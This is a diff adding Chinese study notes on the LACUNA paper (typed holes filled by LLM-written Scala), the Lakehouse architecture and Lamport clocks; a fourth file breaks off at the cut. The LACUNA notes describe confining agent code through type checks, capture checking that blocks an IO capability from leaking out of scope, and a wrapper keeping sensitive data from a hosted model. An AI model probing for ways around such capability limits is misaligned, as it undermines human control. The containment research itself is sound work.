+ +LACUNA 做的就是这样一件事。它的核心问题是: + +> 现在的大模型 Agent 经常"写代码来做事",但模型写的代码和运行这段代码的运行时之间有一条鸿沟。运行时掌握循环、上下文和控制流,模型只能写一小段代码,几乎没有发言权。 + +LACUNA 的答案是:**让模型写的代码变成程序中的一个「类型化孔洞」(typed hole),在运行到这个孔洞时,由模型来填充,并且填充的代码在运行之前必须通过编译器的类型检查。** + +## 二、核心概念拆解 + +### 2.1 类型化孔洞(Typed Hole) + +在编译器术语中,"孔洞"指的是一个还缺少值的占位符。比如你在写 Scala 代码,写了一半不知道后面该填什么,编译器就会显示一个"类型化孔洞",告诉你:"这里需要一个 `Int`,但你还没给出。" + +LACUNA 把这个想法用到运行时: + +```scala +def agent[T](task: String): T +``` + +这行代码的意思是:"我需要一个类型为 `T` 的值,具体内容让大模型来写。" + +- `T` 是期望的结果类型(比如 `String`、`List[Int]`、`Order`) +- `task` 是用自然语言描述的任务 +- 当程序执行到这行时,模型会被调用,生成一段 Scala 代码来产生 `T` +- 生成的代码会在当前作用域内被编译检查——如果类型匹配,就跑;如果不匹配,就拒绝并重试 + +### 2.2 为什么这比 ReAct 更好? + +传统的 ReAct Agent 模式是:模型每次只做一个工具调用(比如"搜索一下"、"读这个文件"),然后交替做推理和行动,直到得出结论。 + +LACUNA 的思路不同:模型写的是**一整段代码**,可以包含循环、条件分支、多个工具调用、甚至嵌套的 `agent` 调用。更重要的是,这段代码在运行前就被编译器检查了——**要么整体通过并运行,要么整体被拒绝,不会出现"部分执行导致状态不一致"的问题。** + +### 2.3 安全保证 + +LACUNA 有三层安全机制: + +1. **静态类型检查**:模型生成的代码必须像手写代码一样通过编译器检查 +2. **原子性**:如果生成的代码有错误,整段代码都不会运行,不会留下不一致的状态 +3. **能力追踪(Capture Checking)**:通过 Scala 3 的能力追踪系统,限制模型生成的代码能访问哪些资源(文件、网络、工具) + +## 三、代码示例 + +### 示例 1:基础用法——过滤素数 + +假设你有一个数字列表,想让模型帮你写出过滤素数的代码: + +```scala +val xs = List(0, 1, 2, 4, 7, 9, 10) + +val r = agent[List[Int]]( + "filter the prime numbers from xs" +) + +// 模型生成的代码可能是: +// def isPrime(n: Int): Boolean = +// n > 1 && (2 until n).forall(n % _ != 0) +// xs.filter(isPrime) + +// 最终结果: +val r: List[Int] = List(2, 7) +``` + +注意几个要点: + +- 类型 `List[Int]` 约束了模型只能返回整数列表,不能返回字符串或单个整数 +- `xs` 是外层程序定义的变量,模型生成的代码可以直接使用它 +- 如果模型返回了错误的类型(比如返回了一个 `String`),编译器会在运行前拒绝这段代码,并把错误信息反馈给模型让它重试 + +### 示例 2:嵌套调用——并行研究并生成报告 + +更强大的场景是嵌套调用。模型生成的代码内部可以再调用 `agent`,形成递归的"孔洞套孔洞": + +```scala +val topics = List( + "LLM", "world models", "transformer", "attention" +) + +val report: String = agent[String]( + "Research each topic and generate a " + + "report on their connections." +) + +// 模型可能生成这样的代码: +val report: String = { + val findings = + topics.par.map(topic => + agent[String](s"Research: $topic") + ) + agent("Generate a report from the findings") +} +``` + +这里发生了什么: + +1. 最外层的 `agent` 被调用,模型收到任务 +2. 模型生成的代码中,对 `topics` 列表做了并行映射,为每个主题发起一个子 `agent` 调用 +3. 每个子调用有自己的类型参数(`String`)和任务描述 +4. 最后再把所有发现汇总成一份报告 + +关键 insight:**嵌套的 `agent` 调用不是特殊的协议,就是普通的控制流。** 它可以分支、循环、并行分解,全部用宿主语言的语法表达。 + +### 示例 3:安全边界——防止越权操作 + +LACUNA 利用 Scala 3 的捕获检查(capture checking)来限制模型代码的能力。看下面这个例子: + +```scala +trait IO extends caps.SharedCapability + +def withIO[T](op: IO^ => T): T = + op(new IO {}) + +def readFile(io: IO, path: String): String = ... + +// 正常用法:读取文件,返回纯字符串(安全) +val res0: String = withIO[String] { io => + agent("read /etc/hosts using io") +} + +// 危险用法:模型试图返回一个携带 io 能力的 lambda(被拒绝!) +val res2: String => String = withIO[String => String] { io => + agent("return a file reader using io") +} +// ❌ 编译错误: +// Capability io outlives its scope: it leaks into +// outer capture set s1 owned by value res2. +``` + +第一个调用是安全的:模型读取文件后返回一个普通字符串,`io` 能力没有泄露出 `withIO` 的作用域。 + +第二个调用被编译器拒绝了:模型试图返回一个 lambda,这个 lambda 捕获了 `io` 能力。但 `io` 是在 `withIO` 内部创建的,它的生命周期不应该超出这个块。编译器在运行前就阻止了这种"能力泄漏"。 + +### 示例 4:敏感数据处理—— Classified 包装器 + +对于敏感数据,LACUNA 可以结合 `Classified` 类型来确保数据永远不会泄露到不受信任的模型中: + +```scala +class Classified[T]: + def map[U](f: T => U): Classified[U] + +val doc: Classified[String] = docs.load(id) + +val report: Classified[Report] = + doc.map { content => + // 这里的 agent 调用指向的是本地可信模型 + local.agent[Report]( + s"follow the skill steps on $content" + ) + } +``` + +- 外层的托管模型(hosted agent)可以看到 `content` 的**源码**,但看不到 `content` 的**值** +- 当 `map` 在运行时展开时,`content` 的值只传递给本地可信模型(local agent) +- 本地模型生成的代码在纯函数作用域内编译,捕获检查禁止它做任何 I/O 操作(包括调用托管模型的 API) +- 结果仍然是 `Classified[Report]`,包装保持完整 + +## 四、编译错误即反馈 + +LACUNA 的一个优雅之处是:编译器的错误信息本身就是给模型的反馈。 + +```scala +val tax: Double = 0.08 +agent[Double]("apply tax to price") + +// 模型生成了:price * (1.0 + tax) +// ❌ 编译错误:Not found: value price + +// 错误信息被送回给模型,模型知道要修复这个问题 +// 可能重试生成:taxAmount * (1.0 + tax) +``` + +模型不需要理解复杂的 JSON schema 或工具注册表。它只需要像写正常的 Scala 代码一样写代码,编译器帮它保证正确性。 + +## 五、实际效果 + +论文中的实验数据: + +- **BrowseComp-Plus 基准测试**:8.6% 的生成在运行前就被类型系统拒绝,平均每个查询 0.7 次重试,准确率达到 27.1% +- **τ²-bench**:在 392 个跨四个领域的任务上,LACUNA 解决了 76.0%,与基线 Agent 持平 +- 每次被拒绝的代码都**完全不执行**,不会留下任何副作用 + +## 六、局限性与思考 + +论文也坦诚了几点局限: + +1. **类型正确 ≠ 逻辑正确**:编译器只检查类型,不检查业务逻辑是否正确 +2. **能力边界取决于授予的范围**:如果外层程序给了太多权限,模型代码也能用那么多 +3. **依赖模型的编码能力**:模型写得越好,效果越好 +4. **延迟和成本**:每次 `agent` 调用都涉及模型推理 + 编译 + 可能的重试 +5. **终止和资源使用**:模型可能生成无限递归的嵌套调用,需要设置深度上限 + +## 七、总结 + +LACUNA 的核心贡献可以用一句话概括: + +> 把 AI Agent 的每一次行动变成一个类型化的程序孔洞,让模型写的代码在运行前接受宿主语言的完整静态检查。 + +这样做的好处是: + +- **安全性**:编译器的保证延伸到模型生成的代码 +- **表达力**:嵌套调用、并行分解、技能复用都是普通控制流 +- **简洁性**:工具就是函数,能力就是作用域,不需要额外的协议层 + +这篇论文由 EPFL 的 Martin Odersky(Scala 之父)等人完成,实现基于 Scala 3,充分利用了 Scala 3 的运行时编译能力和捕获检查系统。 + +--- + +*参考:Zhao, Y., Xu, Y., Bračevac, O., Pham, C. N., Wu, F. Z., & Odersky, M. (2026). LACUNA: Safe Agents as Recursive Program Holes. arXiv:2605.28617.* diff --git a/src/content/docs/papers/lakehouse-2021.md b/src/content/docs/papers/lakehouse-2021.md new file mode 100644 index 000000000..f026ab653 --- /dev/null +++ b/src/content/docs/papers/lakehouse-2021.md @@ -0,0 +1,284 @@ +--- +title: Lakehouse — 用开放格式统一数据仓库与高级分析 +来源: https://www.cidrdb.org/cidr2021/papers/cidr2021_paper17.pdf +日期: 2026-06-13 +子分类: 存储与查询 +分类: 数据库 +provenance: pipeline-v3 +--- + +## 从日常类比开始:公司资料室的三次升级 + +想象一家公司的「资料管理」: + +**第一代(数据仓库)**像**精装档案室**:所有报表材料进门前必须按固定模板整理(schema-on-write),查 BI 报表很快,但扩容贵、视频/日志/图片进不来,新数据也要等 ETL 搬进来才能查。 + +**第二代(湖 + 仓两层)**像**先堆杂物间、再挑精品进档案室**:原始数据廉价丢进 S3/HDFS 的「数据湖」(schema-on-read),重要表再 ETL 到 Snowflake/Redshift。便宜是便宜了,但同一份数据要搬两次、管道多、湖和仓语义不一致,分析师常查到**过期数据**——论文引用的 Fivetran 调查显示 86% 分析师用过过时数据。 + +**第三代(Lakehouse,湖仓一体)**像**带管理员系统的开放货架**:数据仍以 Parquet/ORC 等**开放格式**躺在廉价对象存储上,任何人(SQL 引擎、Spark、TensorFlow)都能直接读文件;同时在文件之上加一层**事务元数据**(Delta Lake / Iceberg / Hudi),补上 ACID、版本、审计、索引统计——BI 和机器学习共用同一套真源,少一层 ETL。 + +这篇 CIDR 2021 论文由 Databricks 的 Michael Armbrust、Ali Ghodsi、Reynold Xin、Matei Zaharia 撰写,提出 Lakehouse 作为下一代开放数据平台架构,并在 TPC-DS 上展示可与主流云数仓竞争的性能。 + +--- + +## 是什么 + +**Lakehouse** = **Data Lake 的低成本开放存储** + **Data Warehouse 的管理能力与 SQL 性能**。 + +论文给出的三个核心特征: + +1. **开放、可直接访问的数据格式**(Apache Parquet、ORC 等),不锁在厂商私有格式里。 +2. **对机器学习 / 数据科学的一等公民支持**——大表用 DataFrame、非 SQL 代码直接读对象存储,而不是经 ODBC/JDBC 慢慢抽。 +3. **接近顶尖数仓的 SQL 性能**——通过缓存、辅助数据结构、数据布局优化,在**不改 Parquet 文件本身**的前提下加速查询。 + +--- + +## 三代数据平台演进 + +| 代际 | 代表 | 存储 | 模式 | 典型问题 | +|------|------|------|------|----------| +| 第一代 | Teradata 等本地数仓 | 专有格式 + 计算存储耦合 | schema-on-write | 扩容贵、非结构化数据难管 | +| 第二代 | S3 湖 + Redshift/Snowflake | 湖用 Parquet;仓用专有格式 | 湖 schema-on-read,仓 schema-on-write | 双 ETL、数据陈旧、ML 难接、存储双份 | +| 第三代 | Lakehouse | 对象存储 + 开放文件 + 元数据层 | 湖上叠加事务与管理 | 需在开放格式上「补」数仓能力(论文论证可行) | + +论文 Figure 1 用一张架构图概括:Lakehouse 把 BI、数据科学、机器学习报告都接到**同一套带元数据层的开放数据**上,而不是 today 常见的「湖 → 再 ETL → 仓」两段式。 + +--- + +## 为什么两层架构让人头疼 + +论文归纳当前「湖 + 仓」的四大痛点(很多是**架构意外复杂度**,而非业务本身必然如此): + +### 1. 可靠性(Reliability) + +湖和仓可能有不同的 SQL 方言、类型语义、表结构(湖宽表、仓星型模型)。多段 ETL/ELT 增加失败点和 silent bug,数据质量更难保证。 + +### 2. 数据陈旧(Data staleness) + +新数据先进湖,再批量进仓,延迟常以**天**计——比第一代「操作库 → 数仓」即时可查还退步。实时业务(推荐、客服)和人工分析都受影响。 + +### 3. 高级分析支持弱(Limited ML support) + +TensorFlow、PyTorch、XGBoost 等需要扫描大表、跑复杂非 SQL 代码。经 JDBC/ODBC 从数仓拉数据效率低;导出到文件又多一步 ETL。ML 系统读 Parquet 湖数据可以,但湖又缺 ACID、版本、索引。 + +### 4. 总拥有成本高(TCO & lock-in) + +持续 ETL 的人力 + 仓内**再存一份**数据的双倍存储 + 专有格式迁移成本。 + +**草房方案**:干脆不要湖,全放支持存算分离的云数仓——论文认为采纳有限,因为仍难管视频/音频/文本,且 ML 仍无法高效直连。 + +--- + +## 核心概念 + +### 1. 元数据层(Metadata Layer) + +对象存储(S3、ADLS、GCS)本身只有「放/取文件」,**跨文件更新一张表不是原子的**。Lakehouse 在文件之上加**事务日志**,记录「哪些 Parquet 文件属于表 version N」。 + +代表实现: + +| 系统 | 起源 | 要点 | +|------|------|------| +| **Delta Lake** | Databricks 2016+ | 事务日志也存 Parquet,可扩到单表数十亿文件;schema enforcement、time travel | +| **Apache Iceberg** | Netflix | 类似设计,支持 Parquet/ORC | +| **Apache Hudi** | Uber | 偏流式 ingest;早期并发写支持较弱 | + +关键能力:ACID 事务、time travel、零拷贝克隆(zero-copy clone)、schema 演进与约束、治理(访问控制、审计)。 + +**无痛迁移**:现有 Parquet 目录只需**加一个 transaction log 指向已有文件**,零拷贝即可变成 Delta 表——论文称这是企业快速采纳的重要原因(Delta 在 Databricks 上三年覆盖约一半计算时长)。 + +### 2. 在开放格式上做出数仓级 SQL 性能 + +Lakehouse **放弃**传统 DBMS 那种「引擎与存储格式完全耦合、对外不可见」的数据独立性——Parquet 成为**公开 API** 的一部分。论文提出三类**不改变 Parquet 文件**的优化: + +1. **Caching**:在 SSD/RAM 缓存热文件;有事务层可判断缓存是否仍有效;缓存可用转码格式(如部分解压 Parquet)匹配引擎。 +2. **Auxiliary data(辅助数据)**:在 transaction log 里维护列 min-max 统计 → **data skipping**;Bloom filter 等索引放在系统可控的辅助文件中(类似 NoDB、raw data indexing 研究线)。 +3. **Data layout(数据布局)**:在 Parquet 内做记录聚簇;Delta 支持 **Z-order / Hilbert 曲线** 多维局部性,让典型分析查询少读数据。 + +典型 workload:**热数据**靠缓存接近闭源数仓;**冷数据**在对象存储上,性能主要取决于**每次查询读多少字节**——布局 + zone map 缩小 I/O。 + +### 3. 声明式 DataFrame API 连接 ML + +ML 库常用 DataFrame 做特征工程。Spark SQL 等把 DataFrame 变换**惰性求值**成查询计划,下推到 Delta Lake 数据源插件——自动用上缓存、跳过、布局优化(论文 Figure 4)。 + +TensorFlow 的 `tf.data` 等不推送语义的路径仍可直接读 Parquet 文件列表,但优化空间较小。 + +### 4. TPC-DS 基准(论文 Figure 3) + +在 scale factor **30,000**、各 **960 vCPU**、本地 SSD 的可比集群上,**Delta Engine**(Spark 上的 C++ 执行引擎 + 上述优化)与四家主流云数仓对比: + +- **查询总耗时**:与 DW1–DW4 相当或更好(图中 Delta on-demand 约 5793s 量级,部分数仓更高)。 +- **成本**:Delta on-demand / spot 在论文定价模型下**明显低于**对比数仓(spot 约 $56 vs 数仓 $153–$570 区间)。 + +冷缓存启动时 Delta Engine 仅慢约 **18%**,说明优化不完全依赖预热。 + +--- + +## 代码示例 + +### 示例 1:把 Parquet 目录升级为 Delta 表(ACID + Schema Enforcement) + +下面用 PySpark 演示 Lakehouse 最基础的「元数据层」价值:同一张逻辑表、原子写入、拒绝脏 schema。 + +```python +from pyspark.sql import SparkSession +from pyspark.sql.types import StructType, StructField, StringType, LongType + +spark = ( + SparkSession.builder + .appName("lakehouse-demo") + .config("spark.sql.extensions", + "io.delta.sql.DeltaSparkSessionExtension") + .config("spark.sql.catalog.spark_catalog", + "org.apache.spark.sql.delta.catalog.DeltaCatalog") + .getOrCreate() +) + +# 假设 s3://company-lake/orders/ 里已有一堆 Parquet 文件 +# 零拷贝:只创建 transaction log,不复制数据 +spark.sql(""" + CONVERT TO DELTA parquet.`s3://company-lake/orders/` +""") + +# 原子追加:要么整批成功,要么读者看不到半写状态 +new_rows = spark.createDataFrame( + [("ord-9001", "CN", 19900)], + ["order_id", "country", "amount_cents"], +) +new_rows.write.format("delta").mode("append").save( + "s3://company-lake/orders/" +) + +# Schema enforcement:列名/类型不匹配会直接失败,而不是 silently 污染表 +bad = spark.createDataFrame([("x",)], ["order_id"]) # 缺 country、amount_cents +try: + bad.write.format("delta").mode("append").save("s3://company-lake/orders/") +except Exception as e: + print("rejected by schema enforcement:", e) + +# Time travel:读昨天版本做审计或对账 +yesterday = spark.read.format("delta").option( + "versionAsOf", 41 +).load("s3://company-lake/orders/") +``` + +这段代码对应论文 3.2 节:元数据层把「一堆 Parquet 文件」提升为**可事务管理的数据库表**,并内置数据质量门禁。 + +### 示例 2:同一 Lakehouse 表 — BI 用 SQL,ML 用 DataFrame + +Lakehouse 的目标之一是**消除「仓给 BI、湖给 ML」的分裂**。BI 分析师和算法工程师读的是同一份 Delta 表,只是接口不同: + +```python +# --- BI 路径:标准 SQL --- +spark.sql(""" + SELECT country, + COUNT(*) AS orders, + SUM(amount_cents) / 100.0 AS revenue_usd + FROM delta.`s3://company-lake/orders/` + WHERE order_date >= DATE '2026-01-01' + GROUP BY country + ORDER BY revenue_usd DESC +""").show() + +# --- ML 路径:DataFrame 特征工程(惰性计划可下推过滤/投影)--- +from pyspark.sql import functions as F + +orders = spark.table("delta.`s3://company-lake/orders/`") +buyers = ( + orders + .filter(F.col("customer_segment") == "buyer") + .select("order_date", "zip", "amount_cents") + .fillna({"amount_cents": 0}) +) + +# MLlib / 其他 Spark ML 库直接 consume buyers +# 引擎会通过 Delta 数据源插件应用 statistics skipping、Z-order 布局、节点缓存 +train = buyers.filter(F.col("order_date") < "2026-06-01") +``` + +论文 Figure 4 的 Spark MLlib 流程与此一致:`users[users.kind == "buyer"]` 等操作被优化器下推,Delta 客户端决定读哪些分区、是否命中 cache——**ML 数据准备享受与 SQL 相同的 Lakehouse 优化**。 + +### 示例 3(可选):Iceberg 的等价 SQL DDL + +若团队选 Apache Iceberg 而非 Delta,思想相同——开放 Parquet + 表级事务: + +```sql +-- Spark + Iceberg catalog +CREATE TABLE warehouse.orders ( + order_id STRING, + country STRING, + amount_cents BIGINT +) USING iceberg +PARTITIONED BY (country); + +INSERT INTO warehouse.orders VALUES ('ord-1', 'CN', 9900); + +-- 时间旅行(Iceberg snapshots) +SELECT * FROM warehouse.orders FOR SYSTEM_TIME AS OF TIMESTAMP '2026-06-01 00:00:00'; +``` + +--- + +## Lakehouse 系统组件(论文 Figure 2) + +``` +┌─────────────────────────────────────────────────────────┐ +│ SQL API Declarative DataFrame API │ +├─────────────────────────────────────────────────────────┤ +│ Metadata, Caching, and Indexing Layer │ +│ (Delta Lake / Iceberg / Hudi) │ +│ · 事务 / 版本 / 治理 │ +│ · 缓存 · 统计 · Bloom · Z-order 布局 │ +├─────────────────────────────────────────────────────────┤ +│ Data files in open format (Parquet / ORC) │ +│ on low-cost object store (S3, ADLS, GCS, HDFS) │ +└─────────────────────────────────────────────────────────┘ +``` + +上层多种引擎(Spark SQL、Presto、Flink、甚至 Snowflake/BigQuery 读 Iceberg)可**并行**读同一存储;GPU 集群跑训练、SQL 集群跑报表,无需再复制一份到专有仓格式。 + +--- + +## 与相关系统的关系 + +| 方向 | 关系 | +|------|------| +| **云原生数仓**(Snowflake、BigQuery) | 存算分离做得好,但多数企业主数据仍在湖;数仓已支持 external Parquet 表,却**无法对湖数据提供与内部表同等的 ACID/索引** | +| **Hive / Presto / Athena** | 直接查湖,但早期缺事务;Hive ACID、Delta/Iceberg 补上了管理特性 | +| **纯 ML 特征仓库**(Feast、DVC) | 很多在重造 DBMS 已有功能;论文认为可直接建在 Lakehouse 事务与版本之上 | +| **HTAP** | 或可经 Lakehouse 事务 API 归档 operational 快照,在一致快照上混合分析 | + +--- + +## 开放问题(论文第 4 节摘要) + +- 事务日志放 S3(低延迟限制 TPS)vs 独立元数据存储的权衡。 +- 单表事务 → **跨表事务**扩展。 +- 是否设计**下一代开放列存格式**(比 Parquet 更利于布局/索引),同时保持多引擎可读。 +- Serverless 查询引擎如何与 rich metadata layer 集成以降低延迟。 +- **Data Mesh** 分布式数据产品:Lakehouse 让各团队通过对象存储共享数据集,无需共享同一计算集群。 + +--- + +## 读完这篇论文,零基础该记住什么 + +1. **Lakehouse 不是又一个产品名**,而是一种架构:**开放文件 + 事务元数据 + 计算引擎优化**。 +2. 它要解决的不是「SQL 快不快」 alone,而是 **ETL 复杂度、数据陈旧、ML 接不上、厂商锁定** 一整套企业数据痛点。 +3. **Delta Lake / Iceberg / Hudi** 是 2021 年前后工业界落地元数据层的三条主路线;今天选哪一个常是组织与生态问题,原理相通。 +4. 性能路径是:**热数据缓存 + 冷数据少读字节**;不是把 Parquet 换成黑盒专有格式。 +5. 若你所在团队仍是「湖进 raw、仓进 curated、ML 再导第三份」,这篇论文给出了清晰的收敛方向——**一份 curated 数据,多种引擎读**。 + +--- + +## 延伸阅读 + +- Delta Lake 系统论文:*Delta Lake: High-Performance ACID Table Storage over Cloud Object Stores*(VLDB 2020) +- 三格式对比:*Analyzing and Comparing Lakehouse Storage Systems*(CIDR 2023) +- 本仓库:[[starrocks]](Lakehouse 直读)、[[databend]](Iceberg 外部表) + +--- + +## 参考 + +- Armbrust, M., Ghodsi, A., Xin, R., & Zaharia, M. (2021). *Lakehouse: A New Generation of Open Platforms that Unify Data Warehousing and Advanced Analytics.* CIDR 2021. +- https://www.cidrdb.org/cidr2021/papers/cidr2021_paper17.pdf diff --git a/src/content/docs/papers/lamport-time-clocks-1978.md b/src/content/docs/papers/lamport-time-clocks-1978.md new file mode 100644 index 000000000..9301b53c3 --- /dev/null +++ b/src/content/docs/papers/lamport-time-clocks-1978.md @@ -0,0 +1,270 @@ +--- +title: Time, Clocks, and the Ordering of Events in a Distributed System — 零基础学习笔记 +来源: https://lamport.azurewebsites.net/pubs/time-clocks.pdf +日期: 2026-06-13 +子分类: 共识与复制 +分类: 分布式系统 +provenance: pipeline-v3 +--- + +## 日常类比:三个城市里的侦探,没有统一的「现在」 + +想象三位侦探分别在北京、上海、广州办案。他们**没有共享一块挂钟**——各自手表每天会快或慢几秒,电话和快递也要几小时才到。 + +某天发生了一桩连环案: + +1. 北京侦探在 9:00 发现线索 A,立刻发电报给上海; +2. 上海侦探在 8:55(自己的表)收到电报——按他的表,**收信比发信还早**; +3. 广州侦探全程没跟任何人联系,在 9:10 独立发现了线索 B。 + +你能说「A 一定发生在 B 之前」吗?**不能**——北京和广州从未交换过信息,他们的发现可能是**真正同时、互不相干**的。你只能确定: + +- 在同一位侦探的笔记本里,**先写的页码一定在前**; +- **发电报这件事,一定发生在对方收电报之前**(消息把因果链串起来); +- 若 A 影响 B、B 影响 C,则 A 间接影响 C(传递性)。 + +Leslie Lamport 在 1978 年发表的 [Time, Clocks, and the Ordering of Events in a Distributed System](https://lamport.azurewebsites.net/pubs/time-clocks.pdf)(CACM,8 页)做的,就是把这种**侦探式推理**变成计算机里可运行的规则:在分布式系统里**放弃「绝对同时」**,改用 **happened-before(先发生于)** 描述因果,再用 **逻辑时钟** 给事件编号,最后把偏序**拉直成全局总序**——这是 Kafka、Raft、Git、Spanner 等系统时间观的共同祖先。 + +Lamport 本人后来回忆:灵感来自狭义相对论——**没有所有观察者都同意的全局时间**,只有与因果相容的偏序;Johnson & Thomas 的副本同步笔记提供了「用时间戳排序消息」的雏形,他把它形式化并修正了会破坏因果的漏洞。 + +## 是什么 + +**分布式系统**(论文定义):多个空间上分离的进程,靠**交换消息**通信;当消息延迟与进程内事件间隔**不可忽略**时,就是「分布式的」。单机多核、多进程也算——因为调度顺序不可预测。 + +论文回答四个层层递进的问题: + +| 层次 | 问题 | 论文给出的工具 | +|------|------|----------------| +| 1 | 两个事件谁在先? | **Happened-before(→)** 偏序 | +| 2 | 如何用数字标记先后? | **逻辑时钟**(Lamport 时间戳) | +| 3 | 算法需要「任意两事件都能比大小」怎么办? | **全序(⇒)**:时间戳 + 进程 ID 打破平局 | +| 4 | 用户眼里「真实时间」和逻辑序冲突怎么办? | **物理时钟同步** + 漂移上界 | + +一句话:**不是让全世界的钟对齐,而是让「因果上必须先发生的事件」在编号上永远更小。** + +## 核心概念 + +### 1. Happened-before(→):因果偏序 + +对系统中任意事件 `a`、`b`,定义 `a → b`(a happens-before b)当且仅当: + +1. **同一进程内**:若 `a` 在 `b` 之前发生,则 `a → b`; +2. **消息传递**:若 `a` 是某条消息的发送,`b` 是该消息的接收,则 `a → b`; +3. **传递性**:若 `a → b` 且 `b → c`,则 `a → c`。 + +若 `a ↛ b` 且 `b ↛ a`,则 `a` 与 `b` **并发(concurrent)**,记作 `a ∥ b`——**谁也没法单凭本地信息断定先后**。 + +```mermaid +flowchart LR + subgraph P1[进程 P1] + e1[e1 本地写] + e2[e2 发送消息 m] + end + subgraph P2[进程 P2] + e3[e3 接收 m] + e4[e4 本地写] + end + subgraph P3[进程 P3] + e5[e5 独立事件] + end + e1 --> e2 + e2 -.消息 m.-> e3 + e3 --> e4 +``` + +上图中:`e1 → e2 → e3 → e4`;`e5` 与 `e1…e4` 中任一事件都可能是并发的。 + +### 2. 逻辑时钟:给事件贴递增编号 + +每个进程 `P_i` 有一个逻辑时钟 `C_i`(可以只是内存里的整数计数器,**不必接真实硬件钟**)。 + +**时钟条件(Clock Condition)**:若 `a → b`,则 `C(a) < C(b)`。 + +保证该条件的两条实现规则(论文 IR1、IR2): + +- **IR1**:进程每发生一个事件,先把本地时钟 `C_i` **加 1**,再给该事件打上当前值; +- **IR2**:进程 `P_i` 发送消息时,把当前 `C_i` **附在消息上**;`P_j` 收到后设 + `C_j := max(C_j, 消息时间戳) + 1`,再处理该接收事件。 + +注意:**`C(a) < C(b)` 推不出 `a → b`**——并发事件的时间戳也可能一大一小,这是工程里「幽灵因果」误判的根源。 + +### 3. 全序(⇒):时间戳 + 进程 ID + +互斥、状态机复制等算法需要**任意两事件都能比较**。定义全序 `a ⇒ b`: + +- 若 `C(a) < C(b)`,则 `a ⇒ b`; +- 若 `C(a) = C(b)`,则 **进程 ID 更小** 的事件排前。 + +全序与 `→` **一致**:若 `a → b`,则必有 `a ⇒ b`。 + +### 4. 应用:分布式互斥(论文 Section 3) + +论文用全序实现了一个**分布式资源锁**(假设消息可靠、进程不故障): + +1. 想进临界区的进程广播带时间戳的 `REQUEST`; +2. 本地把请求放入按 `⇒` 排序的队列; +3. 对队列中**排在最前的自己的请求**,若已从**所有其他进程**收到时间戳**更大**的消息(说明已「见过」更晚的请求),则获得锁; +4. 退出时广播 `RELEASE`。 + +关键洞见:**全序让多副本按同一顺序回放命令**——这就是后来 **State Machine Replication(SMR)** 与 [[paxos]]、[[raft]] 的思想源头。 + +### 5. 物理时钟(论文后半部分) + +若系统事件还包含**电话、用户口头通知**等带外(out-of-band)因果,纯逻辑序可能与用户感知的真实时间矛盾——论文称为 **anomalous behavior**。 + +于是引入物理时钟,要求更强的 **Strong Clock Condition**:对所有可能被带外渠道关联的 `a → b`,有 `C(a) < C(b)`。在时钟精度 `ρ`、消息最小传输时间 `μ` 等假设下,论文推导了时钟漂移的**上界**——这是后来 **NTP**([[ntp-mills-1991]])等协议的理论远亲。 + +## 代码示例 1:逻辑时钟(IR1 + IR2) + +下面用 Python 模拟两个进程的逻辑时钟;`send` / `recv` 代表消息传递。 + +```python +class LamportClock: + def __init__(self, pid: int): + self.pid = pid + self.time = 0 + + def local_event(self) -> tuple[int, int]: + """IR1:本地事件前时钟 +1""" + self.time += 1 + return (self.time, self.pid) + + def send(self) -> tuple[int, int]: + self.time += 1 + return (self.time, self.pid) # 时间戳随消息发出 + + def recv(self, msg_ts: int) -> tuple[int, int]: + """IR2:接收时对齐并 +1""" + self.time = max(self.time, msg_ts) + 1 + return (self.time, self.pid) + + @staticmethod + def total_order(a: tuple[int, int], b: tuple[int, int]) -> int: + """全序:先比时间戳,再比 pid""" + if a[0] != b[0]: + return -1 if a[0] < b[0] else 1 + if a[1] != b[1]: + return -1 if a[1] < b[1] else 1 + return 0 + + +# 模拟:P0 发消息给 P1 +p0, p1 = LamportClock(0), LamportClock(1) +t_send = p0.send() # P0: (1, 0) +t_recv = p1.recv(t_send[0]) # P1: max(0,1)+1 = 2 → (2, 1) +assert t_send[0] < t_recv[0] # 发送 happens-before 接收 ⇒ 时间戳严格递增 +``` + +**读代码时记住**:`recv` 里的 `max` 把「对方已经走过的因果历史」合并进本地计数器,就像侦探收到电报后,把对方笔记本上的页码也对齐到自己的台账里。 + +## 代码示例 2:用全序实现简化的分布式请求队列 + +下面演示论文互斥算法的**排序核心**(省略网络广播与 ACK 细节):每个进程维护全局请求队列,按 `(lamport_ts, pid)` 排序,队首且已「同步」的请求获得锁。 + +```python +from dataclasses import dataclass, field +import heapq + +@dataclass(order=True) +class Request: + ts: int + pid: int + kind: str = field(compare=False) # "REQ" | "REL" + +class MutexNode: + def __init__(self, pid: int, n_peers: int): + self.pid = pid + self.clock = LamportClock(pid) + self.queue: list[Request] = [] + self.last_seen_from = [0] * n_peers # 从各 peer 见过的最大时间戳 + + def request_lock(self): + ts, _ = self.clock.local_event() + heapq.heappush(self.queue, Request(ts, self.pid, "REQ")) + + def on_message(self, sender: int, msg_ts: int, kind: str): + self.last_seen_from[sender] = max(self.last_seen_from[sender], msg_ts) + self.clock.recv(msg_ts) + if kind == "REQ": + heapq.heappush(self.queue, Request(msg_ts, sender, "REQ")) + elif kind == "REL": + # 简化:释放时从队列移除该进程最早 REQ + self.queue = [r for r in self.queue if not (r.pid == sender and r.kind == "REQ")] + heapq.heapify(self.queue) + + def can_enter(self) -> bool: + if not self.queue or self.queue[0].pid != self.pid: + return False + my_ts = self.queue[0].ts + # 已从所有其他进程收到时间戳 > my_ts 的消息 ⇒ 没有更早的未知请求 + for i, seen in enumerate(self.last_seen_from): + if i == self.pid: + continue + if seen <= my_ts: + return False + return True +``` + +生产系统([[kafka-2011]] 单 partition、[[raft]] log index)不会照抄这个互斥,但**「单调序号 + 稳定 tie-breaker + 全序回放」**的结构完全相同。 + +## 时空图:一眼看懂「并发」 + +论文用 **space-time diagram**(时空图)画进程为竖线、消息为斜线。沿竖线向上是同一进程内的时间;斜线连接 send 与 receive。 + +``` +P1: ●───a───●───send───●───b───● + \ / +P2: ●───c───●───recv───●───d───● + +P3: ●───e───●───f───● +``` + +- `a → send → recv → d`(因果链) +- `c` 与 `a` 可能并发,除非有消息相连 +- `e`、`f` 与 P1、P2 上所有事件都可能并发 + +**零基础要点**:图上看不出谁左谁右的并列圆点,就是 concurrent——别用 wall clock 硬排。 + +## 与相关工作的关系 + +| 机制 | 能做什么 | 不能做什么 | 代表 | +|------|----------|------------|------| +| Lamport 时钟 | `a→b ⇒ C(a) truth + page_map_hint: Dict[Tuple[str, int], int] = field(default_factory=dict) # (file, page) -> disk_addr + + def write_page(self, file_id: str, page_no: int, disk_addr: int) -> None: + label = PageLabel(file_id, page_no) + self.labels[disk_addr] = label + self.page_map_hint[(file_id, page_no)] = disk_addr + + def 